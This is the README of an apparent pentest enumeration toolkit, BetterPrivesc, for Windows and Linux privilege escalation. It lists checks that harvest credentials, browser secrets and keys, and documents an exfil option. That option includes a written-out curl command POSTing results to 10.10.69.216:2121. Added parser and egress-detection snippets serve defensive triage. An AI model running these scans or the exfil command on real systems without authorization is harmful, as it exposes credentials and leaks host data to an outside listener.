didntchooseaname/BetterPrivesc

BetterPrivesc

Minimal privilege escalation enumeration scripts for Windows and GNU/Linux. Straight-to-the-point output: only [+] (match), [!] (critical finding), and [-] (inconclusive), no banners, no fluff. English only.

Inspired by PEASS-ng (winPEAS / linPEAS). It implements the same kinds of checks in a compact, script-friendly format and adds an optional keyword search, a local log file, and optional exfil to a remote HTTP server.


Features

  • Minimal output: [+] for findings, [!] for critical/exploitable findings, [-] for inconclusive; section headers with progress bar and step numbers
  • Colorized: green ([+]), red ([!]), yellow ([-]) in the terminal (when supported)
  • Keyword search: recursive search from a root path for user-defined keywords (path + content); excludes system dirs
  • Log to file: -l writes all result output to output.txt in addition to the console
  • Exfil: -e sends the full result output to a remote HTTP server via POST with a binary body to http://ip:port/output.txt

Requirements

| Script | Environment |
|---|---|
| BetterPrivesc.ps1 | Windows, PowerShell 5.1+ |
| BetterPrivesc.sh | GNU/Linux/macOS, POSIX sh; curl for -e |

Windows — BetterPrivesc.ps1

Usage

```powershell
.\BetterPrivesc.ps1 [options]
```

Options

| Parameter | Alias | Description |
|---|---|---|
| -FullCheck | | Include API/keys/tokens regex (more false positives) |
| -Excel | | Include Excel files in credential search |
| -KeywordSearch | | Comma-separated keywords to search under C:\ (excludes \Windows). Output: [+] fullpath:keyword |
| -SearchRoot | | Root for keyword search (default: C:\) |
| -LogFile | -l | Write all result output to output.txt (in addition to console) |
| -Exfiltrate | -e | Send output to http://ip:port/output.txt via POST (binary). Value: "ip:port" |

Examples

```powershell
# Default run
.\BetterPrivesc.ps1

# Keyword search for password, config, secret
.\BetterPrivesc.ps1 -KeywordSearch "password,config,secret"

# Log results to output.txt
.\BetterPrivesc.ps1 -l

# Exfil results to remote server (e.g. listener at 10.10.69.216:2121)
.\BetterPrivesc.ps1 -e "10.10.69.216:2121"

# Combine: keyword search + log + exfil
.\BetterPrivesc.ps1 -KeywordSearch "credential,backup" -l -e "10.10.69.216:2121"
```

Checks (27 sections)

  1. System Information
  2. Token Privileges
  3. UAC & Security Policies
  4. Registry Security
  5. Credential Stores
  6. Windows Vault & DPAPI
  7. Unquoted Service Paths
  8. Service Binary ACLs
  9. DLL Hijacking
  10. Scheduled Tasks
  11. Startup & Autoruns
  12. Service Registry ACLs
  13. Network Information
  14. Installed Applications
  15. Users & Groups
  16. Active Directory
  17. Cloud Credentials
  18. Browser Credentials
  19. Interesting Files & Backups
  20. Sticky Notes / Cmdkey / RDP
  21. SMB Shares
  22. PowerShell History
  23. Processes & Named Pipes
  24. AppLocker & CLM
  25. Additional Privesc Vectors
  26. File Password Search
  27. Registry Password Search
  28. Keyword Search (optional, with -KeywordSearch)

GNU/Linux / macOS — BetterPrivesc.sh

Usage

```sh
./BetterPrivesc.sh [options]
```

Options

| Option | Description |
|---|---|
| -k "kw1,kw2" | Comma-separated keywords; recursive search from root (excludes /proc, /sys, /dev, /run). Output: [+] fullpath:keyword |
| -r /path | Root for keyword search (default: /) |
| -l | Write all result output to output.txt (in addition to console) |
| -e ip port | Send output to http://ip:port/output.txt via curl -X POST --data-binary @file. Two arguments: IP then port. |
| -h | Show help and exit |

Examples

```sh
# Default run
./BetterPrivesc.sh

# Keyword search
./BetterPrivesc.sh -k "password,config,secret"

# Log to output.txt
./BetterPrivesc.sh -l

# Exfil to remote server (e.g. listener at 10.10.69.216:2121)
./BetterPrivesc.sh -e 10.10.69.216 2121

# Keyword search from /opt, log and exfil
./BetterPrivesc.sh -k "credential,backup" -r /opt -l -e 10.10.69.216 2121
```

Checks (25 sections)

  1. System Information
  2. Security Modules
  3. Container / Virtualization
  4. Cloud / Metadata
  5. Users & Groups
  6. Sudo Configuration
  7. Available Software
  8. Running Processes
  9. Cron Jobs
  10. Systemd Timers & Services
  11. Network Information
  12. SUID Binaries
  13. SGID Binaries
  14. File Capabilities
  15. Interesting Files
  16. SSH Keys & Configuration
  17. Writable System Paths
  18. World-writable Files
  19. Passwords & Secrets
  20. Browser & App Credentials
  21. NFS Exports
  22. Docker / LXD / Containerd
  23. D-Bus Services
  24. Backup & History Files
  25. Misc Privesc Vectors
  26. Keyword Search (optional, with -k)

Output format

  • Sections: box-drawn progress bar with step number, e.g. [01/27] System Information
  • Findings: [+] in green
  • Critical: [!] in red (exploitable or high-risk findings)
  • Inconclusive: [-] in yellow
  • Keyword hits: [+] fullpath:keyword

When stdout is not a TTY (e.g. pipe or redirect), the shell script disables ANSI codes so logs stay clean.
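A parser for this output format, useful when triaging a saved output.txt or a run from an authorized assessment. This is an added example, not code from the BetterPrivesc project; it assumes only the markers documented above ([NN/NN] headers, [+]/[!]/[-] lines, fullpath:keyword hits) and that the keyword section's title starts with "Keyword Search". The box-drawing characters around the progress bar are not specified, so everything outside the bracketed counter is trimmed.

```python
import re
from collections import defaultdict

ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")  # colour codes, if a TTY session was captured instead of the -l file
# Header carries "[NN/NN] Title"; the box drawing around it is unspecified, so only the counter is matched.
SECTION_RE = re.compile(r"\[(\d+)/(\d+)\]\s*(.+)$")
RESULT_RE = re.compile(r"^\[([+!-])\]\s*(.*)$")  # [+] / [!] / [-] result lines
# "[+] fullpath:keyword": a Windows path has a drive colon, so the keyword is what follows the last colon.
KEYWORD_HIT_RE = re.compile(r"^(.+):([^:\\/]+)$")

def parse_output(text, keyword_section="Keyword Search"):
    """Return ({section: {"+": [...], "!": [...], "-": [...]}}, [(path, keyword), ...])."""
    sections = defaultdict(lambda: {"+": [], "!": [], "-": []})
    hits = []
    current = "(preamble)"  # result lines seen before the first section header
    for raw in text.splitlines():
        line = ANSI_RE.sub("", raw).strip()
        if not line:
            continue
        m = RESULT_RE.match(line)
        if m:
            marker, body = m.groups()
            kh = KEYWORD_HIT_RE.match(body) if marker == "+" and current.startswith(keyword_section) else None
            if kh:
                hits.append((kh.group(1), kh.group(2)))
            else:
                sections[current][marker].append(body)
            continue
        m = SECTION_RE.search(line)
        if m:
            current = re.sub(r"[\s\-\u2500-\u257F]+$", "", m.group(3))  # trim trailing box/dash chars
            sections[current]  # register the section even if it yields no result lines

    return dict(sections), hits

def critical_findings(sections):
    """Every [!] line paired with its section: what a triager reads first."""
    return [(sec, line) for sec, res in sections.items() for line in res["!"]]

# Constructed sample, not real tool output; step counters and box drawing are illustrative.
SAMPLE = """\
┌──[01/03] System Information ──┐
\x1b[32m[+]\x1b[0m Hostname: WS01
[-] Could not query hotfixes
┌──[02/03] Unquoted Service Paths ──┐
[!] Unquoted path: C:\\Program Files\\Acme App\\svc.exe
┌──[03/03] Keyword Search ──┐
[+] C:\\Users\\bob\\notes.txt:password
"""
```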


Exfil (-e)

Both scripts can send the entire result output (same text as console / output.txt) to a remote HTTP server.

  • Request: POST http://<ip>:<port>/output.txt with the output as the binary body (e.g. Content-Type: application/octet-stream).
  • Windows: -e "ip:port" (e.g. -e "10.10.69.216:2121").
  • GNU/Linux: -e ip port (e.g. -e 10.10.69.216 2121).

Your server should accept the same style of request as:

```sh
curl -X POST --data-binary @./output.txt http://10.10.69.216:2121/output.txt
```

So the script effectively builds the same content, then POSTs it to http://<ip>:<port>/output.txt.
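From the defender's side, the request shape documented above (POST, bare IP host, non-standard port, path /output.txt, binary body) is distinctive enough to flag in egress proxy logs. This is an added example, not part of the BetterPrivesc project; the log format is an assumption (a constructed whitespace-separated layout: timestamp, client, method, URL, request content type, request bytes), and the line for 10.10.69.216:2121 is constructed from the README's own example listener.

```python
import ipaddress
from urllib.parse import urlsplit

def is_bare_ip(host):
    """True when the URL host is a literal IP rather than a hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def score_request(method, url, content_type, req_bytes):
    """List the traits of this request that match the documented exfil POST (empty if none)."""
    reasons = []
    if method.upper() != "POST":
        return reasons
    u = urlsplit(url)
    if u.path.endswith("/output.txt"):
        reasons.append("path /output.txt")
    if u.hostname and is_bare_ip(u.hostname):
        reasons.append("bare IP host")
    if u.port not in (None, 80, 443):
        reasons.append(f"non-standard port {u.port}")
    if content_type == "application/octet-stream" and req_bytes > 0:
        reasons.append("binary body")
    return reasons

def scan_proxy_log(lines, min_reasons=3):
    """Return (client, url, reasons) for each line matching at least min_reasons traits."""
    alerts = []
    for line in lines:
        fields = line.split()
        if len(fields) != 6:  # assumed layout: ts client method url content_type bytes
            continue
        _ts, client, method, url, ctype, size = fields
        reasons = score_request(method, url, ctype, int(size))
        if len(reasons) >= min_reasons:
            alerts.append((client, url, reasons))
    return alerts

# Constructed log lines, not real traffic; only the second one matches the exfil shape.
PROXY_LOG = [
    "1700000000.101 10.0.0.5 GET http://example.com/index.html - 0",
    "1700000000.202 10.0.0.7 POST http://10.10.69.216:2121/output.txt application/octet-stream 20480",
    "1700000000.303 10.0.0.9 POST https://updates.example.com/report application/json 2048",
]
```

The threshold is deliberately tunable: a legitimate binary upload to a bare IP on an odd port scores three traits, so tighten or relax min_reasons to match the environment's baseline.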


Credits

  • PEASS-ng — winPEAS and linPEAS for the enumeration logic and ideas.

License

Use at your own risk. Ensure you have authorization before running on any system.
